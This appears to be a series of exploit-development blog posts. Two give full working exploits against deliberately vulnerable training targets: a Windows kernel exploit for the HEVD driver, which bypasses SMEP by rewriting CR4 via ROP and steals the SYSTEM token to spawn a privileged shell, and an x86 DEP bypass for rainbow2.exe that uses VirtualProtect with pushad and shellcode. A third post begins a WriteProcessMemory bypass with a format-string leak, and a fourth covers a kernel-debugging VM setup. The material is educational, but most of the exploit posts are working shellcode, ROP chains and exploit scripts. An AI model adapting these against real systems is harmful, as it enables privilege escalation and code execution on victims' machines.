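We get an exception (c0000096, privileged instruction): the CPU does not let us load cr4 with zero, because that would clear bits that must stay set in long mode, such as PAE. Let’s inspect its current value: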

1: kd> r cr4
cr4=0000000000350ef8

We can hardcode this value with bit 20 (the SMEP bit) flipped and try again:

*(rop + index++) = 0x350ef8 ^ (1UL << 20);  // 0x250ef8: cr4 with SMEP cleared

1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`737acd47 0f22e1          mov     cr4,rcx
1: kd> r rcx
rcx=0000000000250ef8
1: kd> p
nt!KeFlushCurrentTbImmediately+0x1a:
fffff800`737acd4a c3              ret
1: kd> p
0000026a`93680000 90              nop
1: kd> 
0000026a`93680001 90              nop
1: kd> 
0000026a`93680002 90              nop

With a sane cr4 value that only clears the SMEP bit, the write succeeds and we execute our NOPs from user-mode memory! Now we need kernel shellcode that lets us elevate privileges without causing a BSOD.
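
The bit arithmetic can be double-checked outside the debugger. The following Python sketch assumes the cr4 value read above and that SMEP is bit 20 of CR4; the helper name clear_smep is only illustrative. Masking the bit off is slightly more robust than XOR, which would set SMEP again if it were already clear.

```python
SMEP_BIT = 20  # position of the SMEP flag in CR4

def clear_smep(cr4: int) -> int:
    """Return cr4 with only the SMEP bit cleared."""
    return cr4 & ~(1 << SMEP_BIT)

cr4 = 0x350ef8                      # value read with `r cr4` above
print(hex(clear_smep(cr4)))         # 0x250ef8
print(hex(cr4 ^ (1 << SMEP_BIT)))   # same result while SMEP is set
```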

Kernel Shellcode

For this exploit, we are going to go with a simple token stealing payload. Every process has a token associated that defines its privileges. A pointer to this token is saved in the EPROCESS structure:

0: kd> dt nt!_EPROCESS
...
+0x440 UniqueProcessId      : Ptr64 Void
+0x448 ActiveProcessLinks   : _LIST_ENTRY
...
+0x4b8 Token                : _EX_FAST_REF
...

If we can read this pointer & copy it over the one from our process, we get full SYSTEM privileges. Essentially the shellcode will find our EPROCESS and save a pointer to it. Then it will walk ActiveProcessLinks (which is a linked list of processes) until it finds a SYSTEM process and copies the token pointer from that one over the one from our process.

[BITS 64]
start:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; ApcState.Process (current _EPROCESS)
  mov r8, rax               ; Keep current _EPROCESS in RAX, walk the list with R8

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov r9, [r8 + 0x4b8]      ; Get SYSTEM token
  and r9b, 0xf0             ; Clear low 4 bits of _EX_FAST_REF (byte-sized AND keeps the pointer intact)
  mov [rax + 0x4b8], r9     ; Copy SYSTEM token to current process
  
  xor rax, rax
  ret
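
The list walk is easier to follow in a high-level model. The Python sketch below is purely illustrative: it imitates the circular ActiveProcessLinks list with plain objects (the class and field names are assumptions made for this model, not kernel structures) and performs the same three steps as the assembly: walk until PID 4, mask the low four bits of the _EX_FAST_REF value, copy the result.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Process:                          # stand-in for _EPROCESS
    pid: int
    token: int                          # raw _EX_FAST_REF value (pointer | ref count)
    next: Optional["Process"] = None    # stand-in for ActiveProcessLinks.Flink

def steal_system_token(current: Process) -> None:
    node = current.next
    while node.pid != 4:                # loop: walk until SYSTEM (PID 4)
        node = node.next
    current.token = node.token & ~0xF   # replace: drop the ref-count bits

# Three processes linked in a circle, made-up token values.
system = Process(4, 0xFFFF800012345047)
other = Process(1234, 0xFFFF8000AAAA0063)
me = Process(4321, 0xFFFF8000BBBB0025)
system.next, other.next, me.next = other, me, system

steal_system_token(me)
print(hex(me.token))   # 0xffff800012345040
```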

Note that these offsets differ between Windows builds, so you have to look them up in WinDbg (for example with dt nt!_EPROCESS) on your target. To assemble the shellcode and dump it as a C array, we can use NASM and radare2:

nasm shellcode.asm -o shellcode.bin -f bin
radare2 -b 32 -c 'pc' ./shellcode.bin

#define _BUFFER_SIZE 256
const uint8_t buffer[_BUFFER_SIZE] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  ...
};

While this will work fine and replace the token – we are still in an IOCTL and have messed with the stack. Just returning from here will cause a BSOD. There are at least 2 possibilities here – either we figure out how to restore the stack to the point where we can return somewhere that will not crash or use a generic way to avoid crashes.

For this post we choose the generic approach by Kristal and append its cleanup stub to our shellcode:

[BITS 64]
start:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; ApcState.Process (current _EPROCESS)
  mov r8, rax               ; Keep current _EPROCESS in RAX, walk the list with R8

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov rcx, [r8 + 0x4b8]      ; Get SYSTEM token
  and cl, 0xf0               ; Clear low 4 bits of _EX_FAST_REF structure
  mov [rax + 0x4b8], rcx     ; Copy SYSTEM token to current process

cleanup:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread
  mov cx, [rax + 0x1e4]     ; KTHREAD.KernelApcDisable
  inc cx
  mov [rax + 0x1e4], cx
  mov rdx, [rax + 0x90]     ; ETHREAD.TrapFrame
  mov rcx, [rdx + 0x168]    ; ETHREAD.TrapFrame.Rip
  mov r11, [rdx + 0x178]    ; ETHREAD.TrapFrame.EFlags
  mov rsp, [rdx + 0x180]    ; ETHREAD.TrapFrame.Rsp
  mov rbp, [rdx + 0x158]    ; ETHREAD.TrapFrame.Rbp
  xor eax, eax  ;
  swapgs
  o64 sysret  

This makes our full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x20a386;
	QWORD MOV_CR4_RCX = ntBase + 0x3acd47; 

	int index = 0;
	int bufSize = 2072 + 4 * 8;

	LPVOID uBuffer = VirtualAlloc(NULL, bufSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, bufSize, '\x41');
	RtlCopyMemory(shellcode, sc, 256);

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x350ef8 ^ 1UL << 20;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, bufSize, NULL, 0, NULL, NULL);
	
	printf("[>] Enjoy your shell!\n");
	system("cmd");
	return 0;
}

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Stack Overflow appeared first on Vulndev.

Windows Kernel Exploitation – VM Setup

By: xct
1 July 2022 at 09:43

In this series about Windows kernel exploitation, we will explore various kernel exploit techniques & targets. This topic is mainly something I studied to prepare for AWE. This short first part will deal with the VM setup for the rest of the series. I can not offer downloadable VMs so you will have to follow the steps outlined here to get a comparable environment.

OS Setup

We will use Windows 11 for both the debugger and the debuggee, and everything will be running on VMware Workstation 16. To allow the installation of Windows 11 on VMware, we will have to encrypt the VM:

Then we add a TPM:

If you don’t have a Windows 11 ISO you can get a version here. Note that using Insider Preview is not a good idea since the symbols are not always fully available. After the installation is completed & all updates are installed, create a low-privileged user called user:

net user user user /add

We also want to disable the Windows Update service (we don’t want gadget offsets to change because of Windows updates). Now we continue to install the tools we will need later on.

WinDbgX

WinDbgX (WinDbg Preview) can be installed for free from the Microsoft Store. We are not using Python/mona, so we won’t install them. After installing, start it once and set the symbol path in File->Settings->Debugging Settings to srv*c:\symbols*http://msdl.microsoft.com/download/symbols.

Other Tools

Other tools we install/download on this VM are Visual Studio, Visual Studio Code, rp++ and IDA Free.

Duplicating the VM

After preparing our VM, we need to clone it (Right-Click on VM->Manage->Clone) in order to get a Debugger & Debuggee VM.

At this point, you should have 2 identical VMs. On older versions of Windows, we would have to modify the .vmx files to allow debugging via serial port. Since both VMs run Windows 10 or later, we can debug everything over TCP/IP instead.

Setting up Kernel Debugging

First, we set up proper networking. In my case both VMs have a NAT adapter for internet access & an additional adapter to communicate (VMNET-X):

  • Debugger VM: 172.16.0.100
  • Debuggee VM: 172.16.0.101

On the debuggee VM:

bcdedit /debug on
bcdedit /dbgsettings net hostip:172.16.0.100 port:50000 key:1.2.3.4

On the debugger VM we just have to start WinDbgX and attach it to the kernel:

After a restart of the debuggee WinDbgX automatically attaches and breaks for us:

Connected to Windows 10 22000 x64 target at (Fri Jul  1 02:29:02.526 2022 (UTC - 7:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*
Executable search path is: 
Windows 10 Kernel Version 22000 MP (1 procs) Free x64
Edition build lab: 22000.1.amd64fre.co_release.210604-1628
Machine Name:
Kernel base = 0xfffff804`27000000 PsLoadedModuleList = 0xfffff804`27c29650
System Uptime: 0 days 0:00:02.213
KDTARGET: Refreshing KD connection


We resume with g and let the boot finish. At this point our setup is complete and we create a snapshot on both VMs (with the debugger running). Finally, to make sure everything is working, we start notepad.exe on the debuggee VM and check that we can debug it:

!dml_proc
...
ffff9485`c0f26080 23c8 Notepad.exe  
...
.process /i ffff9485c0f26080 Notepad.exe
g
!process
PROCESS ffff9485c0f26080
    SessionId: 1  Cid: 23c8    Peb: 5fab251000  ParentCid: 10ec
    DirBase: 1aec4a000  ObjectTable: ffffa80fb00d0800  HandleCount: 257.
    Image: Notepad.exe

At this point, everything is working as expected and we can start looking at exploitation in the next post.

Note that under normal circumstances you can not load unsigned drivers like HEVD on Windows 11. With a kernel debugger attached, however, this restriction no longer applies.

The post Windows Kernel Exploitation – VM Setup appeared first on Vulndev.

Bypassing DEP with VirtualProtect (x86)

By: xct
14 June 2022 at 18:46

In the last post we explored how to exploit the rainbow2.exe binary from the vulnbins repository using WriteProcessMemory & the “skeleton” method. Now we are going to use VirtualProtect, and instead of setting up the arguments on the stack with dummy values and then replacing them, we are going to use the pushad instruction to push all registers onto the stack & then execute our function.

We start from the following exploit template:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      0xdeadc0de,
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += b"A" * (offset-len(rop))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close()

0:003> p
deadc0de ??              ???

As before, we use a stack pivot to land in our input buffer and execute a ROP chain, which at this point consists of a single dummy address. Let’s look at how pushad works. It pushes the general-purpose registers onto the stack in the following order: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI (https://c9x.me/x86/html/file_module_x86_id_270.html). The ESP value pushed is the one from before the instruction executed.

We also need to know what arguments VirtualProtect expects:

BOOL VirtualProtect(
  [in]  LPVOID lpAddress,
  [in]  SIZE_T dwSize,
  [in]  DWORD  flNewProtect,
  [out] PDWORD lpflOldProtect
);

The first argument lpAddress is the address at which we want to change memory protections, dwSize gives the size of the region, flNewProtect is a mask for the new protections we want (0x40 = PAGE_EXECUTE_READWRITE) and lpflOldProtect must be a writable address so the old protections can be stored. If we look at the order in which pushad places the values on the stack, we should set up the registers as follows (they end up on the stack in the reverse of the order below, so the ropnop in EDI is the first gadget to run):

# Registers
EAX 90909090  => Shellcode                                               
ECX &writable => lpflOldProtect                                
EDX 00000040  => flNewProtect                                   
EBX 00000501  => dwSize                                           
ESP ????????  => lpAddress (ESP)                         
EBP ????????  => Redirect control flow to ESP              
ESI ????????  => &VirtualProtect
EDI ????????  => RopNop
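
To see why the register table reads bottom-up, the push order can be modelled in a few lines of Python. This is a sketch with placeholder register values (all of them assumptions); it only reproduces the documented push order of pushad, where the ESP slot holds the value ESP had before the instruction.

```python
PUSH_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

def pushad_layout(regs: dict) -> list:
    """Return (address, register, value) tuples, lowest address first."""
    esp = regs["ESP"]
    slots = []
    for name in PUSH_ORDER:
        esp -= 4                      # each push moves ESP down by 4
        slots.append((esp, name, regs[name]))
    return sorted(slots)              # lowest address = new top of stack

regs = {"EAX": 0x11111111, "ECX": 0x22222222, "EDX": 0x40, "EBX": 0x501,
        "ESP": 0x0151F7B0, "EBP": 0x33333333, "ESI": 0x44444444,
        "EDI": 0x55555555}
for addr, name, value in pushad_layout(regs):
    print(f"{addr:08x}  {value:08x}  {name}")
```

EDI ends up at the top of the stack, so it is the first value consumed by the ret that follows pushad.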

Setting those registers up correctly requires some planning: as soon as one of them is set up, you can no longer use it to set up the others. That’s why we set up the most commonly used registers last.

We start by setting up ebx. To get 0x501 into the register without null bytes, we can pop a null-free value and correct it with an add eax, imm32 gadget. In this case there is add eax,5D40C033. Evaluating ? 0x501 - 0x5d40c033 = a2bf44ce gives the value we have to pop into eax so that the addition wraps around to 0x501.

# EBX
# Blocked: None
0x4CBFB + binary_base,  # pop eax; ret;
0xa2bf44ce,             # put delta into eax (goal: 0x00000501 into ebx)
0x7720E + binary_base,  # add eax,5D40C033; ret;
0x3AE24 + binary_base,  # xchg eax, ebx; ret;
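
The delta can also be computed and checked offline. The Python sketch below assumes 32-bit wraparound and uses the bad-byte list determined for this binary in the WriteProcessMemory post; the helper names are illustrative only.

```python
import struct

# Bad bytes for rainbow2.exe (taken from the WriteProcessMemory post).
BAD = bytes.fromhex("000102030405060708090a0b0c0d202f5c")

def null_free_delta(target: int, addend: int) -> int:
    """Value to pop into eax so that eax + addend == target (mod 2**32)."""
    return (target - addend) & 0xFFFFFFFF

def has_bad_bytes(value: int) -> bool:
    """True if the little-endian encoding of value contains a bad byte."""
    return any(b in BAD for b in struct.pack("<I", value))

delta = null_free_delta(0x501, 0x5D40C033)
print(hex(delta), has_bad_bytes(delta))   # 0xa2bf44ce False
```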

Now we set up edx. We use the same trick again to get the value 0x40 into the register without null bytes.

# EDX
# Blocked: EBX
0x4CBD7 + binary_base,  # pop eax; ret;
0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
0x76EFF + binary_base,  # add eax, 0x5D58026A       
0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
0x41414141,             # dummy

We continue by setting ecx. Since this needs a writable address we get one via WinDBG as described in the other post and just pop the value into the register.

# ECX
# Blocked: EBX, EDX
0x72D31 + binary_base,  # pop ecx; ret;
0xA635A + binary_base,  # &writable location

For edi, we set the address of a ropnop gadget directly via pop:

# EDI
# Blocked: EBX, EDX, ECX
0x32301 + binary_base,  # pop edi; ret;
0x774C7 + binary_base,  # ropnop

We set esi by popping the address of a jmp eax gadget. Normally this would hold the address of VirtualProtect but we will store VirtualProtect at the very end in eax – so placing jmp eax here will achieve the same.

# ESI
# Blocked EBX, EDX, ECX, EDI
0x24261 + binary_base,  # pop esi; ret;      
0x14AF9 + binary_base,  # jmp eax (just stored, not executed right away)

Finally we set up eax with the address of VirtualProtect. This is a bit tricky because we do not have a leak in kernel32 and the binary does not use VirtualProtect itself. As in the other post, however, we can read the address of another kernel32 function from the IAT and then subtract the offset between the two functions.

0:001> ?kernel32!WriteFile - kernel32!VirtualProtectStub
Evaluate expression: 12528 = 000030f0

# EAX
# Blocked EBX, EDX, ECX, EDI, ESI
0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x7D695 + binary_base,  # pop ebp dummy 

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp
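
The repeated sub gadgets above add up to exactly the 0x30f0 offset between WriteFile and VirtualProtectStub. A small Python sketch (the function name is hypothetical) shows how such an offset can be split across the available constants. It is a greedy split, which is sufficient here but not guaranteed to find a solution for arbitrary gadget sets.

```python
def split_offset(offset: int, steps: list) -> dict:
    """Greedily express offset as a sum of the available gadget constants."""
    counts = {}
    for step in sorted(steps, reverse=True):
        counts[step], offset = divmod(offset, step)
    if offset:
        raise ValueError(f"remainder {offset:#x} cannot be expressed")
    return counts

# sub eax,1000 and sub eax,0x30 are the two gadgets used in the chain.
print(split_offset(0x30F0, [0x1000, 0x30]))   # {4096: 3, 48: 5}
```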

At this point we can call the pushad instruction to put everything on the stack which then looks as follows:

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp

eax=76c304c0 ebx=00000501 ecx=3fb5635a edx=00000040 esi=3fac4af9 edi=3fb274c7
eip=3fb252ec esp=0151f790 ebp=3fb2d695

0:003> dd /c1 esp
0151f790  3fb274c7 # ropnop
0151f794  3fac4af9 # jmp eax (eax=&VirtualProtect)
0151f798  3fb2d695 # pop ebp (pops 76c304c0)
0151f79c  0151f7b0 # ptr sc  ----
0151f7a0  00000501               |
0151f7a4  00000040               |
0151f7a8  3fb5635a               |
0151f7ac  76c304c0               |
0151f7b0  3fac1394 # jmp esp     |
0151f7b4  90909090  <------------
...

At this point we can execute our shellcode and get our calc. The full exploit can be found below:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x10
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -b '\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2f\x5C'
sc += b"\x29\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
sc += b"\x76\x0e\xad\x9c\x2a\x96\x83\xee\xfc\xe2\xf4\x51\x74"
sc += b"\xa8\x96\xad\x9c\x4a\x1f\x48\xad\xea\xf2\x26\xcc\x1a"
sc += b"\x1d\xff\x90\xa1\xc4\xb9\x17\x58\xbe\xa2\x2b\x60\xb0"
sc += b"\x9c\x63\x86\xaa\xcc\xe0\x28\xba\x8d\x5d\xe5\x9b\xac"
sc += b"\x5b\xc8\x64\xff\xcb\xa1\xc4\xbd\x17\x60\xaa\x26\xd0"
sc += b"\x3b\xee\x4e\xd4\x2b\x47\xfc\x17\x73\xb6\xac\x4f\xa1"
sc += b"\xdf\xb5\x7f\x10\xdf\x26\xa8\xa1\x97\x7b\xad\xd5\x3a"
sc += b"\x6c\x53\x27\x97\x6a\xa4\xca\xe3\x5b\x9f\x57\x6e\x96"
sc += b"\xe1\x0e\xe3\x49\xc4\xa1\xce\x89\x9d\xf9\xf0\x26\x90"
sc += b"\x61\x1d\xf5\x80\x2b\x45\x26\x98\xa1\x97\x7d\x15\x6e"
sc += b"\xb2\x89\xc7\x71\xf7\xf4\xc6\x7b\x69\x4d\xc3\x75\xcc"
sc += b"\x26\x8e\xc1\x1b\xf0\xf6\x2b\x1b\x28\x2e\x2a\x96\xad"
sc += b"\xcc\x42\xa7\x26\xf3\xad\x69\x78\x27\xda\x23\x0f\xca"
sc += b"\x42\x30\x38\x21\xb7\x69\x78\xa0\x2c\xea\xa7\x1c\xd1"
sc += b"\x76\xd8\x99\x91\xd1\xbe\xee\x45\xfc\xad\xcf\xd5\x43"
sc += b"\xce\xfd\x46\xf5\x83\xf9\x52\xf3\xad\x9c\x2a\x96"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      # EBX
      # Blocked: None
      0x4CBFB + binary_base,  # pop eax; ret;
      0xa2bf44ce,             # put delta into eax (goal: 0x00000501 into ebx)
      0x7720E + binary_base,  # add eax,5D40C033; ret;
      0x3AE24 + binary_base,  # xchg eax, ebx; ret;

      # EDX
      # Blocked: EBX
      0x4CBD7 + binary_base,  # pop eax; ret;
      0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
      0x76EFF + binary_base,  # add eax, 0x5D58026A       
      0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
      0x41414141,             # dummy

      # ECX
      # Blocked: EBX, EDX
      0x72D31 + binary_base,  # pop ecx; ret;
      0xA635A + binary_base,  # &writable location

      # EDI
      # Blocked: EBX, EDX, ECX
      0x32301 + binary_base,  # pop edi; ret;
      0x774C7 + binary_base,  # ropnop

      # ESI
      # Blocked EBX, EDX, ECX, EDI
      0x24261 + binary_base,  # pop esi; ret;      
      0x14AF9 + binary_base,  # jmp eax (just stored, not executed)

      # EAX
      # Blocked EBX, EDX, ECX, EDI, ESI
      0x704F4 + binary_base,  # pop eax; ret;
      0x9015C + binary_base,  # IAT WriteFile
      0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x7D695 + binary_base,  # pop ebp dummy 

      0x752EC + binary_base,  # pushad
      0x11394 + binary_base,  # jmp esp
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += sc
buf += b"A" * (offset-len(rop)-len(sc))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close() 

The post Bypassing DEP with VirtualProtect (x86) appeared first on Vulndev.

Bypassing DEP with WriteProcessMemory (x86)

By: xct
12 June 2022 at 12:31

Intro

In this post I will show an example of how to bypass DEP with WriteProcessMemory. This is a bit more complicated than doing it with VirtualProtect but nonetheless an interesting technical challenge. For the target binary I will use rainbow2.exe from my vulnbins repository.

I will skip the reversing/vulnerability discovery part for this post (feel free to explore it by yourself) – essentially we have a file server that has 2 commands:

LST <PATH>
GET <PATH>

Enabled protections are GS, ASLR & DEP. The binary has (at least) 2 vulnerabilities, a format-string vulnerability in path & a stack overflow that is also in path. Note that if you want to play with the binary you have to put it in C:\shared\ as it expects this as the file root.

Format String Vulnerability

By supplying a path containing format string specifiers like %p, we can leak the contents of the stack. This allows us to leak a pointer into the binary, calculate the binary’s base address & thereby defeat ASLR.

Stack Overflow

By supplying a path longer than 1024 we overflow a stack buffer. Since GS is enabled we can not just write through the stack cookie and over the return address in order to exploit it. We can however provide a sufficiently large buffer so that the SEH handler gets overwritten, which defeats GS as we can continue execution from there without returning from the function.

Getting Started

Knowing the vulnerabilities we start by writing an exploit poc that leaks the base address:

#!/usr/bin/env python3
from pwn import *

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

We connect to the server and send LST |%p|%p|%p|%p|, which leaks 4 pointers from the stack:

[DEBUG] Sent 0x12 bytes:
    b'LST |%p|%p|%p|%p|\n'
[DEBUG] Received 0x41 bytes:
    b'ERROR: Can not open Path: |8ACA5DF4|3FAC4120|3FAC4120|0133E550|\n'

In WinDBG we can see that 0x3fac4120 is an address of the binary itself. We calculate the difference of this pointer to the load address of the binary:

0:001> ? 3fac4120-3fab0000 
Evaluate expression: 82208 = 00014120

Since this offset does not change between restarts and the leaked pointer is always the 2nd value on the stack, we can reliably subtract it to get the base address of the binary. If you are used to binary exploitation on Linux you might wonder if we can use %n here to get a write primitive. This is not possible because the Microsoft C runtime disables %n by default.
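
The parsing step can be tried without a live target. The following Python sketch replays the reply shown in the debug output above; the function name is illustrative, and the 0x14120 offset is the one computed in WinDbg for this build of the binary.

```python
LEAK_OFFSET = 0x14120   # leaked pointer minus image base, from WinDbg above

def base_from_reply(reply: bytes) -> int:
    """Extract the second leaked pointer and derive the image base."""
    fields = reply.strip().split(b"|")[1:]   # drop the text before the first '|'
    return int(fields[1].decode(), 16) - LEAK_OFFSET

reply = b"ERROR: Can not open Path: |8ACA5DF4|3FAC4120|3FAC4120|0133E550|\n"
print(hex(base_from_reply(reply)))   # 0x3fab0000
```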

